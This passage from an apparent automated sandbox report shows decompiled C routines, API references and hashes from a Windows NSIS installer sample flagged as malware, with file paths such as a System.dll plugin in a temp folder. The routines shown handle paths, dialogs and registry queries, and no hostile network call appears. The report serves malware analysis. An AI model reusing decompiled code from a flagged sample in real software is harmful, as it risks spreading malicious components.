                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E713C10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                            				void* _v0;
                                                                            				void* _t27;
                                                                            				signed int _t29;
                                                                            				void* _t30;
                                                                            				void* _t34;
                                                                            				void* _t36;
                                                                            				void* _t38;
                                                                            				void* _t40;
                                                                            				void* _t48;
                                                                            				void* _t54;
                                                                            				void* _t63;
                                                                            				void* _t64;
                                                                            				signed int _t66;
                                                                            				void* _t67;
                                                                            				void* _t73;
                                                                            				void* _t74;
                                                                            				void* _t77;
                                                                            				void* _t80;
                                                                            				void _t81;
                                                                            				void _t82;
                                                                            				intOrPtr _t84;
                                                                            				void* _t86;
                                                                            				void* _t88;
                                                                            
                                                                            				 *0x713c506c = _a8;
                                                                            				 *0x713c5070 = _a16;
                                                                            				 *0x713c5074 = _a12;
                                                                            				_a12( *0x713c5048, E713C1651, _t73);
                                                                            				_t66 =  *0x713c506c +  *0x713c506c * 4 << 3;
                                                                            				_t27 = E713C12E3();
                                                                            				_v0 = _t27;
                                                                            				_t74 = _t27;
                                                                            				if( *_t27 == 0) {
                                                                            					L28:
                                                                            					return GlobalFree(_t27);
                                                                            				}
                                                                            				do {
                                                                            					_t29 =  *_t74 & 0x0000ffff;
                                                                            					_t67 = 2;
                                                                            					_t74 = _t74 + _t67;
                                                                            					_t88 = _t29 - 0x66;
                                                                            					if(_t88 > 0) {
                                                                            						_t30 = _t29 - 0x6c;
                                                                            						if(_t30 == 0) {
                                                                            							L23:
                                                                            							_t31 =  *0x713c5040;
                                                                            							if( *0x713c5040 == 0) {
                                                                            								goto L26;
                                                                            							}
                                                                            							E713C1603( *0x713c5074, _t31 + 4, _t66);
                                                                            							_t34 =  *0x713c5040;
                                                                            							_t86 = _t86 + 0xc;
                                                                            							 *0x713c5040 =  *_t34;
                                                                            							L25:
                                                                            							GlobalFree(_t34);
                                                                            							goto L26;
                                                                            						}
                                                                            						_t36 = _t30 - 4;
                                                                            						if(_t36 == 0) {
                                                                            							L13:
                                                                            							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                            							_t74 = _t74 + _t67;
                                                                            							_t34 = E713C1312(E713C135A(_t38));
                                                                            							L14:
                                                                            							goto L25;
                                                                            						}
                                                                            						_t40 = _t36 - _t67;
                                                                            						if(_t40 == 0) {
                                                                            							L11:
                                                                            							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                            							_t74 = _t74 + _t67;
                                                                            							_t34 = E713C1381(_t80, E713C12E3());
                                                                            							goto L14;
                                                                            						}
                                                                            						L8:
                                                                            						if(_t40 == 1) {
                                                                            							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                            							_t10 = _t81 + 4; // 0x4
                                                                            							E713C1603(_t10,  *0x713c5074, _t66);
                                                                            							_t86 = _t86 + 0xc;
                                                                            							 *_t81 =  *0x713c5040;
                                                                            							 *0x713c5040 = _t81;
                                                                            						}
                                                                            						goto L26;
                                                                            					}
                                                                            					if(_t88 == 0) {
                                                                            						_t48 =  *0x713c5070;
                                                                            						_t77 =  *_t48;
                                                                            						 *_t48 =  *_t77;
                                                                            						_t49 = _v0;
                                                                            						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                            						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                            							E713C1603(_t49, _t77 + 8, 0x38);
                                                                            							_t86 = _t86 + 0xc;
                                                                            						}
                                                                            						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                            						GlobalFree(_t77);
                                                                            						goto L26;
                                                                            					}
                                                                            					_t54 = _t29 - 0x46;
                                                                            					if(_t54 == 0) {
                                                                            						_t82 = GlobalAlloc(0x40,  *0x713c506c +  *0x713c506c + 8);
                                                                            						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                            						_t14 = _t82 + 8; // 0x8
                                                                            						E713C1603(_t14, _v0, 0x38);
                                                                            						_t86 = _t86 + 0xc;
                                                                            						 *_t82 =  *( *0x713c5070);
                                                                            						 *( *0x713c5070) = _t82;
                                                                            						goto L26;
                                                                            					}
                                                                            					_t63 = _t54 - 6;
                                                                            					if(_t63 == 0) {
                                                                            						goto L23;
                                                                            					}
                                                                            					_t64 = _t63 - 4;
                                                                            					if(_t64 == 0) {
                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                            						goto L13;
                                                                            					}
                                                                            					_t40 = _t64 - _t67;
                                                                            					if(_t40 == 0) {
                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                            						goto L11;
                                                                            					}
                                                                            					goto L8;
                                                                            					L26:
                                                                            				} while ( *_t74 != 0);
                                                                            				_t27 = _v0;
                                                                            				goto L28;
                                                                            			}



























                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 713C1171
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 713C11E3
                                                                            • GlobalFree.KERNEL32 ref: 713C124A
                                                                            • GlobalFree.KERNEL32(?), ref: 713C129B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C12B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                            • Instruction ID: 5e8fbd836a05fd3ba95f9b9792cdadc451f0d4a2255245f06e916afa2e453ad2
                                                                            • Opcode Fuzzy Hash: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                            • Instruction Fuzzy Hash: 0851C0BAA04216DFE701CF69C844A267BFDFB49B19B10411AF946DB2D0EB34ED11DB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                            				signed int _t14;
                                                                            				int _t17;
                                                                            				void* _t24;
                                                                            				intOrPtr* _t29;
                                                                            				void* _t31;
                                                                            				signed int _t32;
                                                                            				void* _t35;
                                                                            				void* _t40;
                                                                            				signed int _t42;
                                                                            
                                                                            				_t29 = __edi;
                                                                            				_t24 = __ebx;
                                                                            				_t14 =  *(_t35 - 0x28);
                                                                            				_t40 = __edx - 0x38;
                                                                            				 *(_t35 - 0x10) = _t14;
                                                                            				_t27 = 0 | _t40 == 0x00000000;
                                                                            				_t32 = _t40 == 0;
                                                                            				if(_t14 == __ebx) {
                                                                            					if(__edx != 0x38) {
                                                                            						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                            					} else {
                                                                            						E00402DA6(0x21);
                                                                            						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp", "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll", 0x400);
                                                                            						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll");
                                                                            					}
                                                                            				} else {
                                                                            					E00402D84(1);
                                                                            					 *0x40adf0 = __ax;
                                                                            					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                            				}
                                                                            				 *(_t35 + 8) = _t17;
                                                                            				if( *_t29 == _t24) {
                                                                            					L13:
                                                                            					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                            				} else {
                                                                            					_t31 = E0040649D(_t27, _t29);
                                                                            					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                            						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *(_t35 + 8));
                                                                            						_t42 = _t14;
                                                                            						if(_t42 == 0) {
                                                                            							goto L13;
                                                                            						}
                                                                            					} else {
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                            				return 0;
                                                                            			}













                                                                            APIs
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 00402695
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nswCA44.tmp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll
                                                                            • API String ID: 1659193697-2796784181
                                                                            • Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                            • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                            • Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                            • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403019(intOrPtr _a4) {
                                                                            				long _t2;
                                                                            				struct HWND__* _t3;
                                                                            				struct HWND__* _t6;
                                                                            
                                                                            				if(_a4 == 0) {
                                                                            					__eflags =  *0x42aa20; // 0x0
                                                                            					if(__eflags == 0) {
                                                                            						_t2 = GetTickCount();
                                                                            						__eflags = _t2 -  *0x434f0c;
                                                                            						if(_t2 >  *0x434f0c) {
                                                                            							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                            							 *0x42aa20 = _t3;
                                                                            							return ShowWindow(_t3, 5);
                                                                            						}
                                                                            						return _t2;
                                                                            					} else {
                                                                            						return E00406946(0);
                                                                            					}
                                                                            				} else {
                                                                            					_t6 =  *0x42aa20; // 0x0
                                                                            					if(_t6 != 0) {
                                                                            						_t6 = DestroyWindow(_t6);
                                                                            					}
                                                                            					 *0x42aa20 = 0;
                                                                            					return _t6;
                                                                            				}
                                                                            			}







                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
                                                                            			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                            				int _t11;
                                                                            				signed char* _t12;
                                                                            				intOrPtr _t18;
                                                                            				intOrPtr* _t21;
                                                                            				signed int _t23;
                                                                            
                                                                            				E0040653D(0x42fa70, _a4);
                                                                            				_t21 = E00405EB7(0x42fa70);
                                                                            				if(_t21 != 0) {
                                                                            					E004067C4(_t21);
                                                                            					if(( *0x434f18 & 0x00000080) == 0) {
                                                                            						L5:
                                                                            						_t23 = _t21 - 0x42fa70 >> 1;
                                                                            						while(1) {
                                                                            							_t11 = lstrlenW(0x42fa70);
                                                                            							_push(0x42fa70);
                                                                            							if(_t11 <= _t23) {
                                                                            								break;
                                                                            							}
                                                                            							_t12 = E00406873();
                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                            								E00405E58(0x42fa70);
                                                                            								continue;
                                                                            							} else {
                                                                            								goto L1;
                                                                            							}
                                                                            						}
                                                                            						E00405E0C();
                                                                            						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                            					}
                                                                            					_t18 =  *_t21;
                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				return 0;
                                                                            			}









                                                                            APIs
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-3355392842
                                                                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                            				int _t15;
                                                                            				long _t16;
                                                                            
                                                                            				_t15 = _a8;
                                                                            				if(_t15 != 0x102) {
                                                                            					if(_t15 != 0x200) {
                                                                            						_t16 = _a16;
                                                                            						L7:
                                                                            						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                            							_push(_t16);
                                                                            							_push(6);
                                                                            							 *0x42d254 = _t16;
                                                                            							E00404ED4();
                                                                            						}
                                                                            						L11:
                                                                            						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                            					}
                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                            						L10:
                                                                            						_t16 = _a16;
                                                                            						goto L11;
                                                                            					}
                                                                            					_t16 = E00404E54(_a4, 1);
                                                                            					_t15 = 0x419;
                                                                            					goto L7;
                                                                            				}
                                                                            				if(_a12 != 0x20) {
                                                                            					goto L10;
                                                                            				}
                                                                            				E004044E5(0x413);
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405542
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                            				int _v8;
                                                                            				long _t21;
                                                                            				long _t24;
                                                                            				char* _t30;
                                                                            
                                                                            				asm("sbb eax, eax");
                                                                            				_v8 = 0x800;
                                                                            				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                            				_t30 = _a16;
                                                                            				if(_t21 != 0) {
                                                                            					L4:
                                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                                            				} else {
                                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                            					_t21 = RegCloseKey(_a20);
                                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                            						goto L4;
                                                                            					}
                                                                            				}
                                                                            				return _t21;
                                                                            			}








                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                            • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040645C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                            • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403B57() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t8;
                                                                            
                                                                            				_t8 =  *0x42b22c;
                                                                            				_t3 = E00403B3C(_t2, 0);
                                                                            				if(_t8 != 0) {
                                                                            					do {
                                                                            						_t6 = _t8;
                                                                            						_t8 =  *_t8;
                                                                            						FreeLibrary( *(_t6 + 8));
                                                                            						_t3 = GlobalFree(_t6);
                                                                            					} while (_t8 != 0);
                                                                            				}
                                                                            				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                            				return _t3;
                                                                            			}








                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,76FA3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                            • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00405E58(WCHAR* _a4) {
                                                                            				WCHAR* _t5;
                                                                            				WCHAR* _t7;
                                                                            
                                                                            				_t7 = _a4;
                                                                            				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                            				while( *_t5 != 0x5c) {
                                                                            					_push(_t5);
                                                                            					_push(_t7);
                                                                            					_t5 = CharPrevW();
                                                                            					if(_t5 > _t7) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				 *_t5 =  *_t5 & 0x00000000;
                                                                            				return  &(_t5[1]);
                                                                            			}






                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003), ref: 00405E6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                            • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                            • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                            				int _v8;
                                                                            				int _t12;
                                                                            				int _t14;
                                                                            				int _t15;
                                                                            				CHAR* _t17;
                                                                            				CHAR* _t27;
                                                                            
                                                                            				_t12 = lstrlenA(_a8);
                                                                            				_t27 = _a4;
                                                                            				_v8 = _t12;
